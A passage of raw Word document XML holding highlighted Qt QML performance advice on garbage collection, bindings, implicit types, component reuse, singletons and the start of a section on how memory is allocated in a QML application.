      <w:hyperlink r:id="rId669" w:anchor="controlling-element-lifetime" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Controlling Element Lifetime</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1050" w:name="don-t-manually-invoke-the-garbage-collec"/>
      <w:bookmarkStart w:id="1051" w:name="_Toc483000752"/>
      <w:bookmarkStart w:id="1052" w:name="_Toc483604104"/>
      <w:bookmarkStart w:id="1053" w:name="_Toc483605324"/>
      <w:bookmarkEnd w:id="1050"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Don't manually invoke the garbage collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1051"/>
      <w:bookmarkEnd w:id="1052"/>
      <w:bookmarkEnd w:id="1053"/>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In most cases, </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is not wise to manually invoke the garbage collector</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block the GUI thread for a substantial period of time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>skipped frames</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jerky animations</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which should be avoided at all costs.</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976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are some cases</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where manually invoking the garbage collector </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is acceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and this is explained in greater detail in an upcoming section), but </w:t>
      </w:r>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in most cases, invoking the garbage collector is unnecessary and counter-productive</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00215AFC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1054" w:name="avoid-complex-bindings"/>
      <w:bookmarkStart w:id="1055" w:name="_Toc483000753"/>
      <w:bookmarkStart w:id="1056" w:name="_Toc483604105"/>
      <w:bookmarkStart w:id="1057" w:name="_Toc483605325"/>
      <w:bookmarkEnd w:id="1054"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid complex bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1055"/>
      <w:bookmarkEnd w:id="1056"/>
      <w:bookmarkEnd w:id="1057"/>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Aside from the reduced performance of complex bindings (for example, due to having to enter the JavaScript execution context to perform evaluation), they also take up more </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>memory both on the C++ heap and the JavaScript heap than bindings which can be evaluated by QML's optimized binding expression evaluator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00215AFC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1058" w:name="avoid-defining-multiple-identical-implic"/>
      <w:bookmarkStart w:id="1059" w:name="_Toc483000754"/>
      <w:bookmarkStart w:id="1060" w:name="_Toc483604106"/>
      <w:bookmarkStart w:id="1061" w:name="_Toc483605326"/>
      <w:bookmarkEnd w:id="1058"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid defining multiple identical implicit types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1059"/>
      <w:bookmarkEnd w:id="1060"/>
      <w:bookmarkEnd w:id="1061"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00976E5D" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If a QML element has a custom property defined in QML, it becomes its own implicit type</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is explained in greater detail in an upcoming section. </w:t>
      </w:r>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If multiple identical implicit types are defined inline in a component, some memory will </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be wasted</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In that situation it is usually better to </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly define a new component which can then be reused.</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7C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining a custom property can often be a beneficial performance optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example, to reduce the number of bindings which are required or re-evaluated), or </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it can improve the modularity and maintainability of a component</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In those cases, using custom properties is encourage</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the new type should, if it is used more than once, be split into its own component (.qml file) in order to conserve memory</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00F83200">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1062" w:name="re-use-existing-components"/>
      <w:bookmarkStart w:id="1063" w:name="_Toc483000755"/>
      <w:bookmarkStart w:id="1064" w:name="_Toc483604107"/>
      <w:bookmarkStart w:id="1065" w:name="_Toc483605327"/>
      <w:bookmarkEnd w:id="1062"/>
      <w:r w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Re-use existing components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1063"/>
      <w:bookmarkEnd w:id="1064"/>
      <w:bookmarkEnd w:id="1065"/>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7C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you are considering defining a new component, it's worth double checking that such a component doesn't already exist in the component set for your platform</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Otherwise, you will be forcing the QML engine to generate and store type-data for a type which is essentially a duplicate of another pre-existing and potentially already loaded component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00F83200">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1066" w:name="use-singleton-types-instead-of-pragma-li"/>
      <w:bookmarkStart w:id="1067" w:name="_Toc483000756"/>
      <w:bookmarkStart w:id="1068" w:name="_Toc483604108"/>
      <w:bookmarkStart w:id="1069" w:name="_Toc483605328"/>
      <w:bookmarkEnd w:id="1066"/>
      <w:r w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use singleton types instead of pragma library scripts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1067"/>
      <w:bookmarkEnd w:id="1068"/>
      <w:bookmarkEnd w:id="1069"/>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If you are using a pragma library script to store </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application-wide instance data</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, consider using a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId670" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">singleton type instead. This </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should result in better performance, and will result in less JavaScript heap memory being used</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00F83200">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1070" w:name="memory-allocation-in-a-qml-application"/>
      <w:bookmarkStart w:id="1071" w:name="_Toc483000757"/>
      <w:bookmarkStart w:id="1072" w:name="_Toc483003760"/>
      <w:bookmarkStart w:id="1073" w:name="_Toc483604109"/>
      <w:bookmarkStart w:id="1074" w:name="_Toc483605329"/>
      <w:bookmarkEnd w:id="1070"/>
      <w:r w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memory Allocation in a QML Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1071"/>
      <w:bookmarkEnd w:id="1072"/>
      <w:bookmarkEnd w:id="1073"/>
      <w:bookmarkEnd w:id="1074"/>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The memory usage of a QML application may be split into two parts: its C++ heap usage and its JavaScript heap usage. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some of the memory allocated in each will be unavoidable, as it is allocated by the QML engine or the JavaScript engine, while the rest is dependent upon decisions made by the application developer</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The C++ heap will contain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the fixed and unavoidable overhead of the QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (implementation data structures, context information, and so on)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>per-component compiled data and type information, including per-type property metadata, which is generated by the QML engine depending on</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which modules are imported by the application and which components the application loads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>per-object C++ data</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (including property values) plus a </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>per-element metaobject hierarchy, depending on</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which components the application instantiates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
